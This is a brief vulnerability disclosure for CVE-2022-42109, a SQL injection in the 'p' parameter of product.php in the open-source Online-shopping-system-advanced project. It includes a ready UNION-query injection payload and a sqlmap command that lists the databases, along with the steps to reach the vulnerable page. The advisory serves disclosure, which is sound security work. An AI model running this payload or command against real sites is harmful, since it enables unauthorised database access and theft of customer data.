Headline
CVE-2022-42109: Online-shopping-system-advanced — SQL Injection at product.php
Online-shopping-system-advanced 1.0 was discovered to contain a SQL injection vulnerability via the p parameter at /shopping/product.php.
Vulnerability Explanation:
Online-shopping-system-advanced was discovered to contain a SQL injection vulnerability via the p parameter at /shopping/product.php
Affected Component:
http://[ip]/shopping/product.php?p=72
Payload:
Parameter: p (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: p=72 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6a6271,0x61644f4c796848674f74444476795064457842697a416649624d78546f4152624f78644a77446867,0x7170707071),NULL,NULL,NULL,NULL-- -
Tested on:
- Online-shopping-system-advanced
https://github.com/PuneethReddyHC/online-shopping-system-advanced
Steps to attack:
- Go to the mainpage and click on head-phone product.
4. We’ll found /shopping/product.php?p=72
5.Using sqlmap with our URL by the following the command below:
sqlmap -u “http://[IP]/shopping/product.php?p=72” --batch --threads 10 --technique U --dbs
6. We discovered SQL injection vulnerability via the p parameter.
Discoverer:
Grim The Ripper Team by SOSECURE Thailand
Reference:
https://github.com/PuneethReddyHC/online-shopping-system-advanced